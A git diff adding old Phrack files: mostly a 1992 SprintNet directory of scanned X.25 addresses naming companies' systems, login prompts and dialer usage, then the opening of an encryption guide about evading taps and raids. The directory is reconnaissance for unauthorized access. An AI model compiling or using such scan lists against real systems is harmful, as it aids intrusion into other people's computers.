+619 234  $ VAX/VMS     Hightower MicroVAX II (HIGHH1)
+619 258  *
+619 270  $ VAX/VMS     Daniels Headend Node MicroVAX 3100-80 (DANLH1)
+ 
+ 
+ 
+ 
+626  -  unknown  Scanned: [various]           
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+626 1000 $ Prime
+626 1101 $ VAX/VMS     DEV2 
+626 1110 $ VAX/VMS     ANT1 
+626 1111 $ VAX/VMS     ANT2 
+626 1120 $ VAX/VMS     OAK1 
+626 1130 $ VAX/VMS     SRA1 
+626 1131 $ VAX/VMS     SRA2
+626 1160 $ VAX/VMS     SFD1
+626 2000 $ Prime
+ 
+ 
+ 
+ 
+669  -  unknown  Scanned: [various]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+669 25   $             USER ID   
+669 50   $             USER ID   
+669 75   $             USER ID   
+ 
+ 
+ 
+ 
+703  -  Virginia  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+703 40     VAX/VMS
+703 41     VAX/VMS
+703 44     AOS         Project HOPE
+703 55   *
+703 56   *
+703 57                 SELECT A SERVICE: TSO WYLBUR CMS PCI
+703 137  *
+703 157                ZA60001  - COM-PLETE IS ACTIVE
+703 160    VAX/VMS
+ 
+ 
+ 
+ 
+708  -  Illinois  Scanned: [0 - 1000]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+708 34                 USER ID   
+708 50                 Please enter authorized ID:
+708 54   $ VAX/VMS     Duff & Phelps Corporate VAX 8350 (CO) 
+708 66   $             CONNECTED TO PACKET/74
+708 70     VAX/VMS     System LPCOMA 
+708 133    VAX/VMS
+708 138  *
+708 142                Enter user name:
+708 146  *
+708 152                ORBIT
+708 153                ORBIT
+708 154                ORBIT
+708 155                ORBIT
+708 156                ORBIT
+708 157.4              Orbit PAD
+708 157.5              Maxwell Onlines' File Transfer BBS
+708 158                ncp02> enter system id (brs)
+708 161                CONNECTED TO PACKET/94
+708 171    Unix/SysV   FTD BBS (Flowers..)    
+708 178    Unix/SysV   FTD BBS
+708 237    Prime       PRIMENET 22.1.3 DZ-CHI
+708 240                USER ID
+708 241                USER ID 
+708 242                USER ID 
+708 243                USER ID 
+708 244                USER ID 
+708 245                USER ID
+708 246                USER ID 
+708 247                USER ID 
+708 248                USER ID 
+708 249                USER ID  
+708 250                USER ID 
+708 251                USER ID  
+708 252                USER ID 
+708 253                USER ID 
+708 254                USER ID 
+708 260                ORBIT
+708 261                ncp02> enter system id  (brs)
+708 272  $ DTC         'H' or '?' for  help
+708 278  *
+708 340                ORBIT
+708 341                ORBIT
+708 343                ORBIT
+708 346                ENTER APPLID: V=VTAM, A=APPLA, B-APPLB, C=APPLC
+708 1030               ORBIT
+708 1031               ORBIT
+708 1032               ORBIT
+708 1033               ORBIT
+708 1034               ORBIT
+ 
+ 
+ 
+ 
+711  -  unknown  Scanned: various     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+711 15     Prime
+ 
+ 
+ 
+ 
+714  -  California  Scanned: 0 - 300      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+714 4    $             outdial (714)
+714 23   $             outdial (714)
+714 24   $             outdial (714)
+714 50     Unix        atma_1
+714 55   $ HP-3000     HP957.MIS.FUJITSU 
+714 102  $             ? \
+714 119  $             ?  \ outdials? (barred to my pad)
+714 121  $             ?  /
+714 124  $             ? /
+714 130  $             MMSA --- ENTER APPLICATION ID :
+714 131    Prime       PRIMENET 22.1.2 CAJH  
+714 133  *
+714 134
+714 138  $             MMSA --- ENTER APPLICATION ID :
+714 139  $             MMSA --- ENTER APPLICATION ID :
+714 210  $             outdial (global)
+714 213  $             ?
+714 236  *
+714 242    VM/CMS
+714 250  *
+ 
+ 
+ 
+ 
+716  -  New York  Scanned: [0 - 300]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+716 50 
+716 140 
+716 141  *
+716 232    TSO         Bausch and Lomb  Data Center 
+716 233    TSO         Bausch and Lomb  Data Center  
+716 234    TSO         B + L  DATA CENTER SERVICES
+716 235    TSO         B + L  DATA CENTER SERVICES
+716 236    TSO         B + L  DATA CENTER SERVICES
+716 237    TSO         B + L  DATA CENTER SERVICES
+716 238    TSO         B + L  DATA CENTER SERVICES
+716 239    TSO         B + L  DATA CENTER SERVICES
+716 240    TSO         B + L  DATA CENTER SERVICES
+716 241    TSO         B + L  DATA CENTER SERVICES
+716 242    TSO         B + L  DATA CENTER SERVICES
+716 603    TSO         B + L  DATA CENTER SERVICES
+716 605    TSO         B + L  DATA CENTER SERVICES
+ 
+ 
+ 
+ 
+717  -  Pennsylvania  Scanned: [0 - 500]     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+717 24   *
+717 31 
+717 32   *
+717 33   *
+717 34   *
+717 44 
+717 45    VOS          (use "list_users")
+717 46    VOS
+717 47                 Woolworth Management Information Center X.25 
+717 48                 Woolworth Management Information Center X.25
+717 51                 Woolworth Management Information Center Multi-System 
+717 54                 $TM/ID:      (Sprint Address Directory)
+717 55                 $TM/ID:
+717 56                 $TM/ID:
+717 150 *
+717 160 *
+717 161 *
+717 162 *
+717 163 *
+717 234 $ HP-3000      hello field.support
+717 242 $
+717 243                CONNECTED TO PACKET/400
+ 
+ 
+ 
+ 
+747  -  Boeing  Scanned: [N/A]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+747        Note: All addresses in this prefix pass through a network
+                 security validator. I was unable to get passed it and
+                 unable to scan this prefix.
+                 
+                 Network validations as follows:
+ 
+                 ENTER USERID>       
+                 ENTER PASSWORD>
+                 ENTER SERVICE NAME> 
+                 INVALID USER IDENTIFICATION
+ 
+                 After too many attempts, you get this cheerful message:
+ 
+                 NOTICE!!!   This is a private network.  It is
+                 restricted to authorized users only.  If you do
+                 not have authorization, you are warned to
+                 disconnect at once.  Actual or attempted use,
+                 access, communication or examination by
+                 unauthorized persons will result in criminal
+                 and civil prosecution to the full extent of
+                 the law.
+  
+                 If you require assistance in the use of this
+                 network or access to this network, please call:
+                                                    206-865-7168
+                                      if no answer  206-234-0911
+  
+ 
+ 
+ 
+ 
+ 
+755  -  unknown  Scanned: [various]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+755 1001 $ Prime
+755 1002 $ Prime
+755 1003 $ Prime
+755 1004 $ Prime
+755 1012 $             MHP201A IUX0306   APPLICATION: 
+755 1014 $             MHP201A LUX0502   APPLICATION: 
+755 1020 $
+755 1023 $             MHP201A ITVG0182  APPLICATION: 
+755 1025 $             MHP201A ITVG0182  APPLICATION:
+ 
+ 
+ 
+ 
+757  -  unknown  Scanned: [various]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+757 120                (echo)
+757 126                MSG10-RJRT TERMINAL-ID:GSSCXB61 IS NOW IN SESSION
+ 
+ 
+ 
+ 
+784  -  unknown  Scanned: [various]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+784 11000 $            Operator:
+ 
+ 
+ 
+ 
+ 
+787  -  unknown  Scanned: [various]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+787 0      Prime
+787 1      Prime
+787 2      Prime
+787 10001$
+787 50001              USER ID-->    (diverted for network validation)
+787 50002$             Enter profile ID:
+787 50003$
+787 50005 
+787 50006$
+787 70001
+787 70002$
+787 90001  Prime
+787 90003$
+787 90006  Prime       PRIMENET 23.2.0v.PSWI STH-A 
+787 90007$
+787 90008  CRYPTO      ENTER "IDX" OR "ID" AND USER ID -->
+787 90012 
+787 90014  VAX/VMS
+787 90015$             USER ID-->
+787 90016$
+787 90018$
+787 90023$
+787 90025$ VAX/VMS      V{lkommen...  
+787 90026$              access barred
+ 
+ 
+ 
+ 
+789  -  unknown  Scanned: [various]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+789 11000  Prime
+ 
+ 
+ 
+ 
+801  -  Utah  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+801 25                 Wasatch System. 
+801 26                 Wasatch System.
+801 27                 Wasatch System. 
+801 54   $ VAX/VMS     WELCOME TO SOLO - Unathorized use prohibited  
+801 250                ID?> 
+801 260 
+801 360  *
+801 362 
+ 
+ 
+ 
+ 
+804  -  Virginia  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+804 35     VAX/VMS
+804 50   *
+804 153
+804 241  $             CONNECTED TO PACKET/74  
+804 242  *
+804 243  *
+804 244  *
+804 245  *
+804 256                CONNECTED TO PACKET/94
+804 261  *
+804 263  *
+804 264  *
+ 
+ 
+ 
+ 
+805  -  California  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+805 50     VAX/VMS
+805 51     VAX/VMS
+805 52     VAX/VMS
+805 150    Prime       PRIMENET 22.0.1 MBM   
+805 230  $
+ 
+ 
+ 
+ 
+810  -  unknown  Scanned: various      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+810 26   *
+ 
+ 
+ 
+ 
+811  -  unknown  Scanned: various      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+811 13.12              *  
+811 13.16  Unix/SysV 
+811 15   *
+811 17   $ HP-3000
+811 21   $ Unix
+811 22   $ Unix
+811 24   $ Unix
+811 25                 TACL 1> 
+811 27.18  Unix/SysV
+811 27.19  Unix/SysV
+811 43.14  Unix/SysV
+811 43.15  Unix/SysV
+811 67
+811 68 
+811 76.18  Unix/SysV   Highlands VMS A login:
+811 76.19  DACS1       (try 'help' - tons of cmds available)
+811 84.19              *   stat==STATUS STATISTICS? 
+811 85.2               *
+811 141 
+811 142 
+811 150.10             *
+811 315
+811 316
+811 411                MHP201A UEVT20U0  
+811 412                BA
+811 413                @@
+811 414                @@
+811 415 
+ 
+ 
+ 
+ 
+813  -  Florida  Scanned: [0 - 1000]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+813 20   *
+813 21   *
+813 48   *
+813 52   $             Price Waterhouse
+813 53   *
+813 55   $             Price Waterhouse     
+813 59   $             Price Waterhouse National Admin Center
+813 73     VM/CMS
+813 74                 $$ 4200 MODEL:  
+813 124  *
+813 138  *
+813 143A               IBM Information Services.
+813 147A               IBM Information Services.
+813 149  * 
+813 151  $             Price Waterhouse
+813 153  *
+813 154  *
+813 172A               IBM Information Services.
+813 174A               IBM Information Services, Information Network
+813 237  *
+813 240 
+813 248 
+813 261  *
+813 266A               IBM Information Services.
+813 267A               IBM Information Services.
+813 269    VAX/VMS
+813 270    VAX/VMS
+813 271                Access Code: 
+813 272    Prime
+813 277                U#=
+813 330  *
+813 333
+813 352 
+813 358                USER ID 
+813 377
+813 433                USER ID 
+813 434                USER ID 
+813 436                U#=
+813 438    VAX/VMS
+813 450
+813 456                USER ID
+813 457                USER ID 
+813 458                USER ID
+813 459                USER ID 
+813 460                USER ID 
+813 461                USER ID  
+813 465                USER ID
+813 466                USER ID 
+813 467                USER ID
+813 468                USER ID 
+813 469                USER ID 
+813 470                USER ID 
+813 471                USER ID
+813 472                USER ID 
+813 660 
+813 1330 *
+813 1340 *
+ 
+ 
+ 
+ 
+814  -  Pennsylvania  Scanned: [0 - 200]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+814 50     Prime       PRIMENET 23.2.0.R39 SYSA  
+814 130  *
+ 
+ 
+ 
+ 
+816  -  Missouri  Scanned: [0 - 1000 & various]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+816 31   *
+816 36   
+816 179  *
+816 231    VAX/VMS
+816 237    VAX/VMS
+816 238    VAX/VMS
+816 258  *
+816 259  *
+816 341 
+816 356  *
+816 358                CONNECTED TO PACKET/94
+816 359                CONNECTED TO PACKET/94
+816 364  *
+816 434 
+816 442  *
+816 444  *
+816 447  *
+816 450    VAX/VMS
+816 455
+816 456 
+816 462  *
+816 479  *
+816 1041 $             (echo)
+816 1042 $
+816 1045 $
+816 1046 $
+816 1059 *
+816 1058 *
+816 1300   Major BBS   WELCOME TO THE OASIS BBS - NODE 1
+816 90031*
+816 90032*
+816 90038
+816 90042  VAX/VMS     #3MRPGWY
+ 
+ 
+ 
+ 
+818  -  California  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+818 21   *
+818 30   *
+ 
+ 
+ 
+ 
+834  -  unknown  Scanned: various      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+834 10003  VAX/VMS                            
+834 10004  VAX/VMS
+834 10005  VAX/VMS
+834 10006  VAX/VMS
+834 10007  VAX/VMS
+834 10050 through 10099 are all VAXes
+834 10100  Unix        BIX -- ttyx1c, 34101 (Byte Information eXchange)
+834 10101 through 10999 are all VAXes
+834 20005  Prime       PRIMENET 20.2.7 IREX  
+834 20009              MHP1201I TERMINAL CONNECTED TO PACKET/400
+834 20201              (no response)
+834 20202
+834 20203
+834 20204
+834 20205
+ 
+ 
+ 
+ 
+840-849  -  unknwon  Scanned:[N/A]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+840        Note: All these prefixes except 845 pass through Sprint's
+841              TAMS Network validation. I was unable to get passed this 
+842              to scan. These addresses are only left in for the sake of
+843              completeness.
+844
+845      *       845 seems to be disabled.
+846        
+847              Network validation as follows:
+848
+849              YOUR CALL HAS BEEN DIVERTED FOR NETWORK USER VALIDATION.
+                 USER ID :  
+                 PASSWORD :  
+                 BH:INVALID USER ID OR PASSWORD. 
+ 
+ 
+ 
+ 
+ 
+890-895  -  unknown  Scanned:[N/A]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+890      $ Note: none of these addresses accept collect connections,
+891      $       and all of them pass through some sort of network
+892      $       validation. I was unable to get past this, and scan
+893      $       them. These are only left in for the sake of completeness.
+894      $
+895      $       Network validation as follows:
+                
+                 ADTN USER ID: 
+                 ADTN PASSWORD: 
+ 
+ 
+ 
+ 
+909  -  SprintNet  Scanned: various
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+909 3    $             SprintNet Pad
+909 6                  
+909 8      Prime
+909 9      Prime
+909 10     Prime
+909 12     Prime
+909 13
+909 14                 SprintNet Pad
+909 18 
+909 18.11              DJ    
+909 18.13              CARL  
+909 18.14              APPLE 
+909 18.15              GTEES 
+909 18.16              SONIC
+909 18.17              NLM
+909 18.18              ECSBBDS
+909 18.19              ECSDIRE
+909 18.20              ECSDREV
+909 18.22              PLANETM
+909 18.23              PLANDIR
+909 18.24              SCANDIR
+909 18.25              SCANECS
+909 18.26              GRASSRT
+909 18.27              GABST
+909 18.28              INPLAND
+909 18.29              INPLANM
+909 18.30              ECHO
+909 18.31              FARS
+909 18.33              ACTB
+909 18.34              OAG
+909 18.35              CAPLANM
+909 18.38              PLANPBB
+909 18.39              DOAG
+909 18.40              ACSDB
+909 18.41              TOP
+909 18.42              PAGES
+909 18.43              CHEMJOB
+909 18.44              OHPLANM
+909 18.45              OHPLAND
+909 18.46              ILPLANM
+909 18.47              ILPLAND
+909 18.48              GWN
+909 18.49              CHEMREF
+909 18.50              BOREAL
+909 18.51              COMPETE
+909 18.52              SAMI
+909 18.53              UTINFO
+909 18.54              KWIC
+909 18.55              GRAD
+909 18.56              SYM
+909 18.57              CONDO
+909 18.58              ISTHMUS
+909 18.59              NETWRKS
+909 18.70              PLANOSA
+909 18.71              GROUP
+909 18.72              CMADR
+909 18.73              NEWS
+909 18.74              IEEEDB
+909 18.75              XDATA
+909 18.76              LOCAL
+909 18.77              CAPLAND
+909 18.78              ERC
+909 18.79              SEAGRAN
+909 18.80              NSSDC
+909 18.83              COLD
+909 18.84              GEOREF
+909 18.85              NTIS
+909 18.86              CURRENT
+909 18.87              SABRE
+909 18.88              ARCTIC
+909 18.89              ECS
+909 23     Prime
+909 26     Prime
+909 27     Prime
+909 33   $             (not from this DTE)
+909 38                 User name?
+909 39     Prime
+909 44     Prime
+909 49                 USER ID
+909 51                 Your call cannot be completed (unknown destination).
+909 52                 Your call cannot be completed (unknown destination).
+909 53                 User name?  
+909 54
+909 55                 USER ID 
+909 58 
+909 58
+909 62                 User name? 
+909 63                 User name?
+909 65                 User name? 
+909 77     Prime
+909 79                 MHP201A XLU76001  * VERSION 6.1.3 *
+909 82     Prime
+909 90     Prime
+909 92     Prime
+909 94     Prime
+909 95     Prime
+909 97     Prime
+909 98     Prime       Please login [CMOS]: 
+909 100    Prime
+909 103                TELENET ASYNC TO 3270 SERVICE 
+909 104                TELENET ASYNC TO 3270 SERVICE
+909 107  *
+909 116    Prime
+909 117    Prime
+909 121 
+909 123                User name?
+909 125 
+909 126 
+909 130    Prime
+909 131    Prime
+909 136    Prime
+909 137    Prime
+909 139    Prime
+909 140                TACL 1> 
+909 141    Prime
+909 143    Prime
+909 144    Prime
+909 146                User name?
+909 147                User name?
+909 148                User name? 
+909 149                User name? 
+909 151                
+909 153                TACL 1> 
+909 155                User name? 
+909 158                User name?
+909 159                User name?
+909 160                User name? 
+909 161                User name?
+909 162                User name? 
+909 165                User name? 
+909 167                TACL 1> 
+909 168                User name?
+909 171                TELENET ASYNC TO 3270 SERVICE 
+909 172                TELENET ASYNC TO 3270 SERVICE 
+909 173                User name?
+909 176    Prime
+909 178                USER ID 
+909 179                USER ID 
+909 184    Prime
+909 205    Prime
+909 206    Prime
+909 212    Prime       Please login [S212]:
+909 235    Prime       Please Login [S235]:
+909 236    Prime       Please Login [S235]:   
+909 239    Prime 
+909 302    Prime       Please login [S302]: 
+909 331  *
+909 352                !LOAD AND FUNCTION TESTER
+909 353                !LOAD AND FUNCTION TESTER
+909 354                !LOAD AND FUNCTION TESTER
+909 355                !LOAD AND FUNCTION TESTER
+909 400                User name? 
+909 401                User name?
+909 402    Unix        DG/UX Release 4.31. AViiON (tpx1b)
+909 403                User name? 
+909 404                User name? 
+909 406                User name? 
+909 407                User name?  
+909 408                User name? 
+909 409                User name? 
+909 500    Prime
+909 501    Prime
+909 502    Prime
+909 503    Prime
+909 555    Unix        DG/UX  (joker)
+909 615    Prime 
+909 623                User Name?  
+909 626                User name? 
+909 627                User name? 
+909 628                User name? 
+909 629                User name? 
+909 630                User name? 
+909 631                PC-Pursuit BBS                
+909 640                User name? 
+909 641                User name?
+909 642                User name?
+909 643                User name?
+909 644    Unix        X.29 Terminal Service (courts)
+909 645                User name?
+909 649 
+909 650                User name?
+909 651                User name?
+909 652    Unix        X.29 Terminal Service (courts)
+909 656                REJECTING 00 00
+909 661                
+909 751                SPRINT EASTERN REGION NETWORK 
+909 761                User name?
+909 762                User name?
+909 763                User name?
+909 764                TELENET ASYNC TO 3270 SERVICE 
+909 767                SPRINT EASTERN REGION NETWORK
+909 769 
+909 770    Unix        X.29 Terminal Service (fan2)
+909 772    Prime
+909 776    Unix        DG/UX Release 4.31. AViiON (tpx1b)
+909 777                TELENET ASYNC TO 3270 SERVICE 
+909 779                TELENET ASYNC TO 3270 SERVICE 
+909 784                TELENET ASYNC TO 3270 SERVICE
+909 798    Prime       Please login [S798] 
+909 800                User name? help
+909 801    Unix        DG/UX Release 4.31. AViiON (tpx1b)
+909 805                User name? 
+909 806                Your call cannot be completed (unknown destination).
+909 811    Unix        DG/UX Release 4.31. AViiON (tpx1b)
+909 813                User name?  
+909 814                User name? 
+909 816                User name? 
+909 817                User name? 
+909 818                User name?  
+909 819                User name?
+909 822                User name? 
+909 823                User name? 
+909 824                User name? 
+909 828                User name?
+909 830                User name?
+909 831                User name?
+909 840                User name?
+909 841                User name?
+909 842                User name? 
+909 843                User name? 
+909 844                User name?  
+909 845                User name? 
+909 846                Your call cannot be completed (unknown destination).
+909 847
+909 849    Unix        X.29 Terminal Service
+909 900    Prime
+909 901    Prime
+909 2070   Prime       Please Login [S235]: 
+909 2075   Prime       Please login [S2075]:
+909 2080   Prime       Please login [CMOS]:
+909 2086   Unix        DG/UX  (iceman) 
+909 2090   Prime       Please login [S798] 
+909 2091   Prime
+909 2092   Prime
+ 
+ 
+ 
+ 
+910  -  SprintNet  Scanned: various     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+910 100    Prime
+910 101    Prime
+910 200    Prime
+910 400    Prime
+910 401    Prime
+910 500    Prime
+910 501    Prime
+910 503    Prime       Please Login.
+910 504    Prime       Please Login.
+910 600    Prime  
+910 601    Prime
+ 
+ 
+ 
+ 
+920  -  unknown  Scanned: [various]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+920 102                INSTITUTE OF NUCLEAR POWER OPERATIONS
+920 103                INSTITUTE OF NUCLEAR POWER OPERATIONS
+920 104                You are now connected to the computer. (16)
+920 105                INSTITUTE OF NUCLEAR POWER OPERATIONS
+920 106                You are now connected to the computer. (16)
+920 107                You are now connected to the computer. (16)
+ 
+ 
+ 
+ 
+933  -  unknown  Scanned: [various]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+933 10000  Unix        DG/UX Release 4.32. AViiON (atlantic)
+                       Note: all other addr's after 1000 = BUSY!
+ 
+ 
+ 
+ 
+Mnemonic Addresses  Scanned: N/A
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+APPLE      Unix        4.3 BSD UNIX (apple.com)
+BCS                    ACCESS TO THIS ADDRESS NOT PERMITTED.
+BETA                   (hangs)
+BIX        Unix        Welcome to BIX -- ttyx11c, 34101
+BRS                    ENTER BRS PASSWORD 
+CCC02                  GOOD DAY, PLEASE ENTER YOUR ID NUMBER
+CCC03                  GOOD DAY, PLEASE ENTER YOUR ID NUMBER
+CLARIONET  Major BBS   Userid : new
+CMS                    enter a for astra 
+COM                    NOT REACHABLE 05 E6
+CONTEL                 GTE Contel DUAT System (airplane stuff)
+COS                    enter a for astra 
+D41        Prime       Primecom Network 19.4Q.111 System 41
+D42        Prime       Primecom Network 19.4Q.111 System 42
+D43        Prime       Primecom Network 19.4Q.111 System 43
+D44        Prime       Primecom Network 19.4Q.111 System 44
+D46        Prime       Primecom Network 19.4Q.111 System 46
+D52        Prime       Primecom Network 19.4Q.111 System 52
+D56        Prime       Primecom Network 18.4Y System 56
+D57        Prime       Primecom Network 19.4Q.111 System 57
+D61        Prime       Primecom Network 19.4Q.111 System 31
+D64        Prime       Primecom Network 19.4Q.111 System 64
+DELPHI     VAX/VMS     Username:                     
+DIALOG                 Dialog Information Services
+DIR
+DOW                    WHAT SERVICE PLEASE????
+DUAT                   GTE Contel DUAT System
+DUNS                   Dunsnet (D&B)
+EIES       Unix        HP-UX ciathp A.B7.00 U 9000/835
+FAR                    Please enter your ID number: 
+FED                    REJECTING 00 E8
+GOLD     $
+GTEMAIL                SprintNet Directory           
+INFO                   Your call cannot be completed (unknown destination).
+IRIS                   NOT REACHABLE 05 E6
+ITI        VAX/VMS     Usuario :
+KIS                    ACCESS TO THIS ADDRESS NOT PERMITTED.
+LEXIS                  Lexis and Nexis
+MAIL                   SprintNet Directory
+META       Unix        tmn!login:
+MMM                    USER ID   
+MUNI                   ACCESS TO THIS ADDRESS NOT PERMITTED.
+NAS                    PLEASE ENTER  LOGIN
+NASA 
+NET        Prime       NewsNet
+NETX       SNPBBS      Telenet's NETXBBS (Old PCP/New Buisnesscall bbs?)
+NLM                    PLEASE ENTER  LOGIN
+NSF                    ACCESS TO THIS ADDRESS NOT PERMITTED.
+OAG                    PLEASE ENTER SUBSCRIBERID;PASSWORD
+OLS                    NOT OPERATING 09 00
+ONLINE     VOS         Please login
+ORBIT                  ENTER ORBIT USERID
+PDN        Major BBS   Public Data Network (BBS)  User-ID? new
+PLASPEC    Unix
+PLAY     $ 
+PORTAL                 Portal Communications Company.
+PSINET   $
+PURSUIT    SNPBBS      PC-Pursuit BBS                
+QUICK                  PLEASE ENTER YOUR BMG USERID  : 
+SIS        NOS         CDCNET 
+SPR                    REMOTE PROCEDURE ERROR 11 51
+STK1                   ACCESS TO THIS ADDRESS NOT PERMITTED.
+STK2                   ACCESS TO THIS ADDRESS NOT PERMITTED.
+STK3                   ACCESS TO THIS ADDRESS NOT PERMITTED.
+TELEX                  User name? 
+TELEMAIL               User name?
+TPE      $ Major BBS   (adult chat/bbs)  Member-ID? new
+TRACK    $
+TRW                    User name?
+UNISYS                 ACCESS TO THIS ADDRESS NOT PERMITTED.
+USIBM                  
+VONS                   USER ID 
+VUTEXT                 VU/TEXT 
+WARNER                 ACCESS TO THIS ADDRESS NOT PERMITTED.
+WESTLAW                ENTER ID
+ZIFF                   **** Invalid sign-on, please try again ****
+ 
+ 
+ 
+PC-Pursuit Dialers
+~~~~~~~~~~~~~~~~~~
+Usage:  C D/<dialer>/<baud>,<nui>,<password>  (Note:  bauds are 3, 12, or 24)
+ 
+NPA  Dialer
+~~  ~~~~~~
+313  MIAAR
+404  GAATL
+512  TXAUS
+617  MABOS
+312  ILCHI
+708  ILCHI (1-708+num)
+815  ILCHI (1-815+num)
+216  OHCLE
+714  CACOL
+614  OHCOL
+214  TXDAL
+817  TXDAL (817+num)
+303  CODEN
+313  MIDET
+818  CAGLE
+310  CAGLE (1-310+num)
+213  CAGLE (1-213+num)
+203  CTHAR
+516  NYHEM
+713  TXHOU
+317  ININ12
+317  ININ24
+816  MOKCI
+913  MOKCI
+213  CALAN
+310  CALAN (1-310+num)
+818  CALAN (1-818+num)
+305  FLMIA
+414  WIMIL
+612  MNMIN
+201  NJNEW
+908  NJNEW (1-908+num)
+901  TNMEM
+601  TNMEM (1-601+num)
+908  NJNBR
+201  NJNBR (1-201+num)
+504  LANOR 
+212  NYNYO
+516  NYNYO (1-516+num)
+718  NYNYO (1-718+num)
+914  NYNYO (1-914+num)
+415  CAOAK (1-415+num)
+510  CAOAK
+407  FLORL
+415  CAPAL
+408  CAPAL (1-408+num)
+510  CAPAL (1-510+num)
+215  PAPHI
+602  AZPHO
+412  PAPIT
+503  ORPOR
+919  NCRTP
+916  CASAC
+801  UTSLC
+619  CASDI
+415  CASFA
+510  CASFA (1-510+num)
+408  CASJO
+510  CASJO (1-510+num)
+415  CASJO (1-415+num)
+714  CASAN
+310  CASAN (1-310+num)
+213  CASAN (1-213+num)
+206  WASEA
+314  MOSLO
+618  MOSLO (1-618+num)
+813  FLTAM
+202  DCWAS
+703  DCWAS (1-703+num)
+301  DCWAS (1-301+num)
+ 
+ 
+ 
+  ************************End SprintNet Directory 92**************************
+ 
+                                                                         -Sky
+
+
+
diff --git a/phrack42/11.txt b/phrack42/11.txt
new file mode 100644
index 0000000..e82a3de
--- /dev/null
+++ b/phrack42/11.txt
@@ -0,0 +1,621 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Two, File 11 of 14
+
+
+              ###################################################
+              # The Paranoid Schizophrenics Guide to Encryption #
+              #   (or How to Avoid Getting Tapped and Raided)   #
+              ###################################################
+
+                        Written by The Racketeer of
+                            The /-/ellfire Club
+
+
+        The purpose of this file is to explain the why and the how of Data
+Encryption, with a brief description of the future of computer security,
+TEMPEST.
+
+        At the time of this issue's release, two of the more modern software
+packages use encryption methods covered in this article, so exercise some of
+your neurons and check into newer releases if they are available.  Methods
+described in this file use PGP, covering an implementation of Phil Zimmermann's
+RSA variant, and the MDC and IDEA conventional encryption techniques by using
+PGP and HPACK.
+
+                              --------------------
+                              WHY DATA ENCRYPTION?
